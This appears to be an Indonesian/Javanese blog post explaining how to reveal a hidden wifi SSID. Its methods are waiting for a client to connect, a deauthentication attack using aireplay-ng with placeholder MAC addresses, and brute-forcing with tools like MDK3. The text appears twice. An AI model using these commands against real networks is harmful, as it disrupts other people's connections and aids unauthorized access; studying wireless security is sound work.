aireplay-ng, airodump-ng (cloak hidden ssid)
Posted by Ismawan | Posted in | Posted on 15.12
"Cloak hidden ssid"
- Menunggu client terhubung ke AP untuk melakukan authentication
- Deauthentication attack
- Brute Force SSID
#Menunggu client terhubung ke AP untuk melakukan authentication :
wah… lha lek iki yo kudu nyanggong suwi, koyok pas arep mbesang cah wedok ngono lo… hehehe….. iso2 ngenteni nganti lumute ki…..
#Deauthentication attack :
Agar lebih cepat, biasanya channel wifi saya set ke AP “tujuan” yang akan di intip ssid nya.
- airmon-ng start [interface] [channel]
- airodump [interface] [filename] [channel]
- aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY [interface]
Keterangan ;
-0 1 = attack mode
-a XX:XX:XX:XX:XX:XX = MAC address AP
-c YY:YY:YY:YY:YY:YY = MAC address Destination
Interface = ath0
Lalu lihat capture an hasil aireplay-ng menggunakan airodump. Dalam hitungan detik (emboh pirang detik.. ora tau tak itung... :) ….. nampaklah ssid “tujuan”.
Untuk lebih jelasnya, silahkan lihat manual aireplay-ng --help
# Brute Force SSID
Beberapa attacker menggunakan tools seperti MDK3.
SSID_jack pun mampu melakukan cloak hidden ssid.
Penutup :
jangan melakukannya pada jaringan milik orang laen kalo gak pengen busted ato kena karma. Ok.
REFERENSI
remote-exploit.com
securityfocus.com
Wi-foo, Andrew A. Vladimirov, Konstantin V. Gavrilenko, Andrei A. Mikhailovsk
- Menunggu client terhubung ke AP untuk melakukan authentication
- Deauthentication attack
- Brute Force SSID
#Menunggu client terhubung ke AP untuk melakukan authentication :
wah… lha lek iki yo kudu nyanggong suwi, koyok pas arep mbesang cah wedok ngono lo… hehehe….. iso2 ngenteni nganti lumute ki…..
#Deauthentication attack :
Agar lebih cepat, biasanya channel wifi saya set ke AP “tujuan” yang akan di intip ssid nya.
- airmon-ng start [interface] [channel]
- airodump [interface] [filename] [channel]
- aireplay-ng -0 1 -a XX:XX:XX:XX:XX:XX -c YY:YY:YY:YY:YY:YY [interface]
Keterangan ;
-0 1 = attack mode
-a XX:XX:XX:XX:XX:XX = MAC address AP
-c YY:YY:YY:YY:YY:YY = MAC address Destination
Interface = ath0
Lalu lihat capture an hasil aireplay-ng menggunakan airodump. Dalam hitungan detik (emboh pirang detik.. ora tau tak itung... :) ….. nampaklah ssid “tujuan”.
Untuk lebih jelasnya, silahkan lihat manual aireplay-ng --help
# Brute Force SSID
Beberapa attacker menggunakan tools seperti MDK3.
SSID_jack pun mampu melakukan cloak hidden ssid.
Penutup :
jangan melakukannya pada jaringan milik orang laen kalo gak pengen busted ato kena karma. Ok.
REFERENSI
remote-exploit.com
securityfocus.com
Wi-foo, Andrew A. Vladimirov, Konstantin V. Gavrilenko, Andrei A. Mikhailovsk

Comments (0)
Posting Komentar